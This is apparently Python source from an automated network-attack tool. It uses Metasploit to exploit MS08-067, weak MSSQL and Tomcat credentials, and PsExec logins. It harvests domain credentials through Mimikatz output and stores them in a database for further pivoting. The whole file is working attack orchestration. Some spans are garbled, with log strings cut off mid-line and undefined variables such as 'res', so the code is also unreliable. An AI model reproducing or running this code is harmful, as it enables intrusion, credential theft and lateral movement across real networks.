def collectCredentials(footprint_id): logVal("cred", "started") conf = ConfigParser.ConfigParser() conf.read("connections.conf") db = MySQLdb.connect(host="localhost", user=conf.get('MySQL', 'user'), passwd=conf.get('MySQL', 'pass'), db=conf.get('MySQL', 'db')) db.autocommit(True) msfpass = "" while msfpass == "": time.sleep(1) msfpass = dbfunctions.getMsfPass(db, footprint_id) connected = False client = None console_id = None logVal("cred", "got pass: "******"cred", "got res: " + str(res)) console_id = res['id'] #while True: if True: if True: host_data = dbfunctions.getHostToLogInTo(db, footprint_id) if host_data == None: logVal("cred", "no hosts to log in to. will check again in 5 seconds") time.sleep(5) else: #try: if True: logVal("cred", "log in to host {0} with creds {1}\{2} : {3}".format(host_data[1], host_data[3], host_data[4], host_data[5])) lhost = netifaces.ifaddresses('eth0')[netifaces.AF_INET][0]['addr'] msflog = metasploitfunctions.loginWithPsExec(client, console_id, lhost, host_data[1], msfpass, host_data[3], host_data[4], host_data[5]) logVal("cred", "logged into {0}. looking for creds".format(host_data[1])) loginSuccess = True for l in msflog: if l.find("STATUS_LOGON_FAILURE") > -1: loginSuccess = False logVal("cred", "creds did not work on {0}".format(host_data[1])) dbfunctions.addLoginAttemptResult(db, host_data[0], host_data[2], False) if loginSuccess: logVal("cred", "creds worked on {0}".format(host_data[1])) dbfunctions.addLoginAttemptResult(db, host_data[0], host_data[2], True) creds = metasploitfunctions.extractMimikatzCreds(msflog) for cred in creds: dbfunctions.addDomainCreds(db, footprint_id, cred[1], cred[0], cred[2], "", "", "") logVal("cred", "adding creds {0} :: {1} :: {2}".format(cred[1], cred[0], cred[2])) #except: #logVal("cred", "an error occurred") cleanup = client.call('console.destroy',[console_id])
def vulnExploiter(footprint_id, options): conf = ConfigParser.ConfigParser() conf.read("connections.conf") db = MySQLdb.connect(host="localhost", user=conf.get('MySQL', 'user'), passwd=conf.get('MySQL', 'pass'), db=conf.get('MySQL', 'db')) db.autocommit(True) msfpass = "" while msfpass == "": time.sleep(1) msfpass = dbfunctions.getMsfPass(db, footprint_id) while True: if options.exploitMs08067: host_data = dbfunctions.getHostVulnerableToMS08067(db, footprint_id) if host_data == None: logVal("ms08", "no vulnerable hosts. will check again in 5 seconds") else: print "exploiting ms08" p1 = multiprocessing.Process(target=exploitMS08067, args=(footprint_id, )) p1.start() p1.join() if options.expoitWeakMsSqlCreds: host_data = dbfunctions.getHostVulnerableWeakSqlCreds(db, footprint_id) if host_data == None: logVal("sql", "no vulnerable hosts. will check again in 5 seconds") else: print "exploiting sql" p2 = multiprocessing.Process(target=exploitWeakSqlCreds, args=(footprint_id, )) p2.start() p2.join() if options.exploitWeakTomcatCreds: host_data = dbfunctions.getHostVulnerableWeakTomcatCreds(db, footprint_id) if host_data == None: logVal("tomcat", "no vulnerable hosts. will check again in 5 seconds") else: print "exploiting tomcat" p2 = multiprocessing.Process(target=exploitWeakTomcatCreds, args=(footprint_id, )) p2.start() p2.join() if options.credPivot: host_data = dbfunctions.getHostToLogInTo(db, footprint_id) if host_data == None: logVal("cred", "no hosts to log in to. will check again in 5 seconds") else: #collectCredentials(footprint_id) print "logging in with known creds" p = multiprocessing.Process(target=collectCredentials, args=(footprint_id, )) p.start() p.join() time.sleep(1)
def exploitMS08067(footprint_id): logVal("ms08", "started") conf = ConfigParser.ConfigParser() conf.read("connections.conf") db = MySQLdb.connect(host="localhost", user=conf.get('MySQL', 'user'), passwd=conf.get('MySQL', 'pass'), db=conf.get('MySQL', 'db')) db.autocommit(True) msfpass = "" while msfpass == "": time.sleep(2) msfpass = dbfunctions.getMsfPass(db, footprint_id) connected = False client = None console_id = None logVal("ms08", "got pass: "******"ms08", "got res: " + str(res)) console_id = res['id'] logVal("ms08", "connected") if True: #try: if True: #while True: host_data = dbfunctions.getHostVulnerableToMS08067(db, footprint_id) if host_data == None: logVal("ms08", "no vulnerable hosts. will check again in 5 seconds") time.sleep(5) else: try: logVal("ms08", "exploiting host {0}".format(host_data[0])) lhost = netifaces.ifaddresses('eth0')[netifaces.AF_INET][0]['addr'] msflog = metasploitfunctions.exploitMS08067(client, console_id, lhost, host_data[0], msfpass) creds = metasploitfunctions.extractMimikatzCreds(msflog) for cred in creds: dbfunctions.addDomainCreds(db, footprint_id, cred[1], cred[0], cred[2], "", "", "") logVal("ms08", "adding creds {0} :: {1} :: {2}".format(cred[1], cred[0], cred[2])) dbfunctions.setHostExploitedDate(db, host_data[1]) except: logVal("sql", "error exploiting host {0}".format(host_data[0])) time.sleep(1)
def exploitWeakTomcatCreds(footprint_id): logVal("tomcat", "started") conf = ConfigParser.ConfigParser() conf.read("connections.conf") db = MySQLdb.connect(host="localhost", user=conf.get('MySQL', 'user'), passwd=conf.get('MySQL', 'pass'), db=conf.get('MySQL', 'db')) db.autocommit(True) msfpass = "" while msfpass == "": time.sleep(1) msfpass = dbfunctions.getMsfPass(db, footprint_id) connected = False sqlclient = None sqlconsole_id = None logVal("tomcat", "got pass: "******"tomcat", "got res: " + str(sqlres)) sqlconsole_id = sqlres['id'] if True: if True: # while True: host_data = dbfunctions.getHostVulnerableWeakTomcatCreds(db, footprint_id) if host_data == None: logVal("tomcat", "no vulnerable hosts. will check again in 5 seconds") time.sleep(5) else: #try: if True: logVal("tomcat", "exploiting host {0}".format(host_data[0])) lhost = netifaces.ifaddresses('eth0')[netifaces.AF_INET][0]['addr'] msflog = metasploitfunctions.exploitWeakTomcatCreds(sqlclient, sqlconsole_id, lhost, host_data[0], msfpass, host_data[3].split(":")[0], host_data[3].split(":")[1].replace("<empty>", "")) logVal("tomcat", "done exploiting {0}. extracting creds".format(host_data[0])) creds = metasploitfunctions.extractMimikatzCreds(msflog) for cred in creds: dbfunctions.addDomainCreds(db, footprint_id, cred[1], cred[0], cred[2], "", "", "") logVal("tomcat", "adding creds {0} :: {1} :: {2}".format(cred[1], cred[0], cred[2])) dbfunctions.setHostExploitedDate(db, host_data[1])